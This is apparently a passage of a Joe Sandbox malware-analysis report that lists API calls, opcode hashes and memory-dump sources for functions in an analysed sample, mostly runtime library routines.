                                                              • Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                              • Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
                                                              • Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                              • Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C
                                                              APIs
                                                              • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
                                                              • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                              • String ID: pScheduler
                                                              • API String ID: 3657713681-923244539
                                                              • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                              • Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
                                                              • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                              • Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog3_catchmake_shared
                                                              • String ID: MOC$RCC$v)D
                                                              • API String ID: 3472968176-3108830043
                                                              • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                              • Instruction ID: bfd7818decd64fa599f9f57c8d04e82935a596c9ca942e64c5762841d71a1ba5
                                                              • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                              • Instruction Fuzzy Hash: A0F03CB1A00514DFDB16FBA5C4006AE3B65AF15B05B469097E4445B260CB785988CFA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                              • Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
                                                              • Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                              • Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                              • Instruction ID: 638c6d89fbce057c4e3dd2c61558b9519687e7f3e0227f2698054f98d66f9aea
                                                              • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                              • Instruction Fuzzy Hash: AD71AF71900216DBDF21CF99E884ABFBFB6EF4572CF54422BE41157290DB708982CBA1
                                                              APIs
                                                                • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                              • _free.LIBCMT ref: 00430B4F
                                                              • _free.LIBCMT ref: 00430B66
                                                              • _free.LIBCMT ref: 00430B85
                                                              • _free.LIBCMT ref: 00430BA0
                                                              • _free.LIBCMT ref: 00430BB7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: _free$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 3033488037-0
                                                              • Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                              • Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
                                                              • Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                              • Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 3033488037-0
                                                              • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                              • Instruction ID: f82ca20b189b8137b97b4a785df3662bd38b35e9413d5145dfb4eb3d9334e506
                                                              • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                              • Instruction Fuzzy Hash: D5519032A00704AFDB21DF6AD891B6BB7F5EF69724B14156EE809DB250E731E901CB80
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                              • Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
                                                              • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                              • Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                              • Instruction ID: dc67612cb229e640dd9053dbefcd7cb2562cfebe55b7af3f5626d21d4c3eda05
                                                              • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                              • Instruction Fuzzy Hash: 4C41DF36A002049FCB20DF79C990AAEB7E6EF98714F1545AED919EB381D731E901CB80
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
                                                              • __alloca_probe_16.LIBCMT ref: 00436922
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
                                                              • __freea.LIBCMT ref: 0043698E
                                                                • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                              • String ID:
                                                              • API String ID: 313313983-0
                                                              • Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                              • Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
                                                              • Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                              • Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94
                                                              APIs
                                                              • _SpinWait.LIBCONCRT ref: 0041AEEB
                                                                • Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39
                                                              • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
                                                              • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
                                                              • List.LIBCMT ref: 0041AFB4
                                                              • List.LIBCMT ref: 0041AFC3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                              • String ID:
                                                              • API String ID: 3281396844-0
                                                              • Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                              • Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
                                                              • Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                              • Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A
                                                              APIs
                                                              • _SpinWait.LIBCONCRT ref: 0248B152
                                                                • Part of subcall function 02481188: _SpinWait.LIBCONCRT ref: 024811A0
                                                              • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0248B166
                                                              • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0248B198
                                                              • List.LIBCMT ref: 0248B21B
                                                              • List.LIBCMT ref: 0248B22A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                              • String ID:
                                                              • API String ID: 3281396844-0
                                                              • Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                              • Instruction ID: aabba020d17ecca51ada248c89119aed95fc0fc51d4dfc2164fee1eb17813de1
                                                              • Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                              • Instruction Fuzzy Hash: 3A315232A20616DFCB16FFA4C9906EEBBB2FF05348B04406FC805BB641CB716909CB91
                                                              APIs
                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
                                                              • GdipAlloc.GDIPLUS(00000010), ref: 00402072
                                                              • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
                                                              • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
                                                              • GdiplusShutdown.GDIPLUS(?), ref: 004020E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                              • String ID:
                                                              • API String ID: 2357751836-0
                                                              • Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                              • Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
                                                              • Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                              • Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8
                                                              APIs
                                                              • std::_Locinfo::_Locinfo.LIBCPMT ref: 024750A3
                                                              • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024750B7
                                                              • std::_Locinfo::_Locinfo.LIBCPMT ref: 0247511C
                                                              • __Getcoll.LIBCPMT ref: 0247512B
                                                              • std::_Locinfo::~_Locinfo.LIBCPMT ref: 0247513B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
                                                              • String ID:
                                                              • API String ID: 2395760641-0
                                                              • Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                              • Instruction ID: 395c1ffbd8be14887cdae244d72618791d151c1109a24223cde4737e02e7dbb4
                                                              • Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                              • Instruction Fuzzy Hash: AC2198B2814208AFDB11EFA5C484BDDBBB1FF50716F50845FE4A5AB280DBB49948CF91
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                              • _free.LIBCMT ref: 00431F98
                                                              • _free.LIBCMT ref: 00431FBF
                                                              • SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                              • SetLastError.KERNEL32(00000000), ref: 00431FD5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                              • Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
                                                              • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                              • Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D
                                                              APIs
                                                              • GetLastError.KERNEL32(0247DAD7,0247DAD7,00000002,0249ED35,024A3951,00000000,?,02496A05,00000002,00000000,00000000,00000000,?,0247CF88,0247DAD7,00000004), ref: 024A21CA
                                                              • _free.LIBCMT ref: 024A21FF
                                                              • _free.LIBCMT ref: 024A2226
                                                              • SetLastError.KERNEL32(00000000,?,0247DAD7), ref: 024A2233
                                                              • SetLastError.KERNEL32(00000000,?,0247DAD7), ref: 024A223C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                              • Instruction ID: 3f866474c3a6331fbe90defd2663998d42fcd66c8cb0b230a2ee07bafb44e7a1
                                                              • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                              • Instruction Fuzzy Hash: 1501F937245B003B9316AB355C64E6B262EABF1B72B10013FFC15963D1EFF088069529
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                              • _free.LIBCMT ref: 00431F11
                                                              • _free.LIBCMT ref: 00431F39
                                                              • SetLastError.KERNEL32(00000000), ref: 00431F46
                                                              • SetLastError.KERNEL32(00000000), ref: 00431F52
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                              • Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
                                                              • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                              • Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
                                                              • _free.LIBCMT ref: 024A2178
                                                              • _free.LIBCMT ref: 024A21A0
                                                              • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21AD
                                                              • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                              • Instruction ID: 530fb421b4aeea4bdd977ac753655353c8eb359f940b8d7925027ee7f25cb720
                                                              • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                              • Instruction Fuzzy Hash: DCF0A935544A003BD617A735AC29B1F262A9FF2F62F15012FFD1992390EFE185029529
                                                              APIs
                                                                • Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743
                                                              • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A
                                                                • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
                                                                • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
                                                                • Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
                                                                • Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071
                                                              • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
                                                              • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
                                                              • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0041798A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                              • String ID:
                                                              • API String ID: 4266703842-0
                                                              • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                              • Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
                                                              • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                              • Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD
                                                              APIs
                                                                • Part of subcall function 024829A4: TlsGetValue.KERNEL32(?,?,02480DC2,02482ECF,00000000,?,02480DA0,?,?,?,00000000,?,00000000), ref: 024829AA
                                                              • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02487BB1
                                                                • Part of subcall function 0249121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 02491241
                                                                • Part of subcall function 0249121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0249125A
                                                                • Part of subcall function 0249121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 024912D0
                                                                • Part of subcall function 0249121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 024912D8
                                                              • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02487BBF
                                                              • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02487BC9
                                                              • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02487BD3
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02487BF1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                              • String ID:
                                                              • API String ID: 4266703842-0
                                                              • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                              • Instruction ID: 61cfcb8a269d5cf9be908b7264bd024e1ef9575c5d928871ac7cba30587f69f1
                                                              • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                              • Instruction Fuzzy Hash: 9EF0F035A206586BCF15F7BB882096EFA6BDFC1B18B10416FD811A3350EF649E058ED2
                                                              APIs
                                                              • _free.LIBCMT ref: 00439E5D
                                                                • Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                              • _free.LIBCMT ref: 00439E6F
                                                              • _free.LIBCMT ref: 00439E81
                                                              • _free.LIBCMT ref: 00439E93
                                                              • _free.LIBCMT ref: 00439EA5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                              • Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
                                                              • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                              • Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D
                                                              APIs
                                                              • _free.LIBCMT ref: 024AA0C4
                                                                • Part of subcall function 024A36D1: HeapFree.KERNEL32(00000000,00000000,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?), ref: 024A36E7
                                                                • Part of subcall function 024A36D1: GetLastError.KERNEL32(?,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?,?), ref: 024A36F9
                                                              • _free.LIBCMT ref: 024AA0D6
                                                              • _free.LIBCMT ref: 024AA0E8
                                                              • _free.LIBCMT ref: 024AA0FA
                                                              • _free.LIBCMT ref: 024AA10C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                              • Instruction ID: 9bdfb0a4629b27b43b71d5c52d9e02c352ffd42c6b8cc2325cd89e18435b3b67
                                                              • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                              • Instruction Fuzzy Hash: EAF06232509620AB8670EF59E8D6C0777EAAA14790764095BF008D7B11CB75F890CE59
                                                              APIs
                                                              • _free.LIBCMT ref: 00431748
                                                                • Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                              • _free.LIBCMT ref: 0043175A
                                                              • _free.LIBCMT ref: 0043176D
                                                              • _free.LIBCMT ref: 0043177E
                                                              • _free.LIBCMT ref: 0043178F
                                                              Memory Dump Source
